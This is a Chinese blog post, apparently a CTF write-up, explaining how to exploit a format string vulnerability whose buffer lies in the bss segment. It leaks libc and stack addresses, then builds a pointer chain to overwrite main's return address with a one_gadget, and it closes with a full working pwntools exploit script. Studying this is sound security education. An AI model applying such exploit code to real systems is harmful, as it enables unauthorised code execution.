非栈上格式化字符串漏洞

一、简介

之前写的都是在栈上的格式化字符串漏洞,那么今天学习非栈上,顾名思义就是在bss段或者堆上,由于作者没有学到堆,所以只写了在bss段上的。同时这道例题也是对上篇手搓格式化字符串漏洞payload的延伸与巩固,那么直接通过题来学习。

https://blog.csdn.net/weixin_66751120/article/details/136167826

二、例题

七次带有格式化字符串漏洞的循环,同时跟进buf后,并不是在栈上,而是在bss段。

根据之前写的经验,肯定要用libc基址与one_gadget,然后修改主函数的返回地址,那么用老方法找偏移时,就会发现找不到,当然,它不在栈上,自然测不了,那么随便输入几个%p,再根据gdb中内容,来观察泄露的位置,再不断修改得到正确的libc start main +243的地址,以及一个随便的栈地址,做完这些前置条件,重点就来了

蓝色框就是main函数的返回地址,绿线是一条随机的有a->b->c的链,因为我们使用%c只能修改c位置,并且这些栈地址只有最后两位不一样,如果我们能够把c位置指针修改为返回地址的栈地址,那么会构成a->b->c->d的链子,那就一定存在b->c->d的链子,而且d位置就是原来的main函数返回地址,那么就可以在这条链子中将d位置最后两字节修改为one_gagdet的尾两字节

这样之后如果继续按照原来的方式就会发现错误,第三个指针依然指的是返回地址的栈地址的尾两字节,而我们要修改前两个字节了,那就需要把上面构造的方式再用一次,让原来的返回地址栈地址加2就可以,与修改尾两字节相同的方式,再写一次,

然后one_gadget的地址与返回地址前两字节相同,改不改都可以,如果不改的话,需要再跑两次循环使七次循环结束。

下面是完整exp:

from pwn import*
context(os='linux',arch='amd64',log_level='debug')
elf=ELF('./pwn2')
p = process("./pwn2")
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
def bug():
	gdb.attach(p)
	pause() 

p.recvuntil(b'hello\n')
pay=b'%9$p%11$p'
bug()
p.send(pay)
p.recvuntil(b'0x')
libc_base=int(p.recv(12),16)-243-libc.sym['__libc_start_main']
print(hex(libc_base))
p.recvuntil(b'0x')
stack=int(p.recv(12),16)
print(hex(stack))
one_gadget=0xe3b01+libc_base
print(hex(one_gadget))
main=stack-240
stack1=main+0x10

p.recvuntil(b'hello\n')
pay=(b'%'+str(main&0xffff).encode()+b'c%11$hn').ljust(0x28,b'\x00')+p64(stack1)
pause()
p.send(pay)

p.recvuntil(b'hello\n')
pay=(b'%'+str(one_gadget&0xffff).encode()+b'c%39$hn').ljust(0x28,b'\x00')+p64(stack)
pause()
p.send(pay)

p.recvuntil(b'hello\n')
main=main+2
pay=(b'%'+str(main&0xffff).encode()+b'c%11$hn').ljust(0x28,b'\x00')+p64(stack1+2)
pause()
p.send(pay)

p.recvuntil(b'hello\n')
pay=(b'%'+str(one_gadget>>16&0xffff).encode()+b'c%39$hn').ljust(0x28,b'\x00')+p64(stack+2)
pause()
p.send(pay)

p.recvuntil(b'hello\n')
main=main+2
pay=(b'%'+str(main&0xffff).encode()+b'c%11$hn').ljust(0x28,b'\x00')+p64(stack1+4)
pause()
p.send(pay)

p.recvuntil(b'hello\n')
pay=(b'%'+str(one_gadget>>32).encode()+b'c%39$hn').ljust(0x28,b'\x00')+p64(stack+4)
pause()
p.send(pay)

p.interactive()

每个pay最后的p64()是写栈上格式化字符串漏洞时栈对齐时需要的,由于这里不在栈上,那么这里不加就可以。

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

江屿..

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值